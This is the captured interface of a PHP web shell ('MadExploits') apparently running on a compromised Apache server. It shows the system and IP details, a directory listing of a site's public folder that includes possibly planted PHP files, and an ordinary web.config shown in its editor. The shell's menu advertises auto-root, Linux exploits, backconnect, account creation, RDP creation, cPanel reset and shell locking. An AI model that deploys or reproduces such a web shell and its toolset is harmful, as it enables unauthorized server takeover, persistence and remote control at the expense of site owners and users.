Linux localhost.localdomain 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Apache
: 10.29.51.72 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
7.2.34
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mpc_emas /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
Cannavaro
[ DIR ]
drwxr-xr-x
Login_v2
[ DIR ]
drwxr-xr-x
adminLTE
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
ckfinder
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dumpfiles
[ DIR ]
drwxr-xr-x
front
[ DIR ]
drwxr-xr-x
fullcalendar
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
newsticker
[ DIR ]
drwxr-xr-x
untrackedfiles
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
uploads_20062025_2000
[ DIR ]
drwxr-xr-x
.htaccess
573
B
-rw-r--r--
ams.php
7.35
KB
-rw-r--r--
ams.txt
0
B
-rw-r--r--
ecuti.php
4.89
KB
-rw-r--r--
favicon.ico
0
B
-rw-r--r--
index.php
1.8
KB
-rw-r--r--
robots.txt
26
B
-rw-r--r--
toaccessdb.php
349.5
KB
-rw-r--r--
web.config
937
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : web.config
<configuration> <system.webServer> <rewrite> <rules> <rule name="Imported Rule 1" stopProcessing="true"> <match url="^(.*)/$" ignoreCase="false" /> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> </conditions> <action type="Redirect" redirectType="Permanent" url="/{R:1}" /> </rule> <rule name="Imported Rule 2" stopProcessing="true"> <match url="^" ignoreCase="false" /> <conditions> <add input="{REQUEST_FILENAME}" matchType="IsDirectory" ignoreCase="false" negate="true" /> <add input="{REQUEST_FILENAME}" matchType="IsFile" ignoreCase="false" negate="true" /> </conditions> <action type="Rewrite" url="index.php" /> </rule> </rules> </rewrite> </system.webServer> </configuration>
Close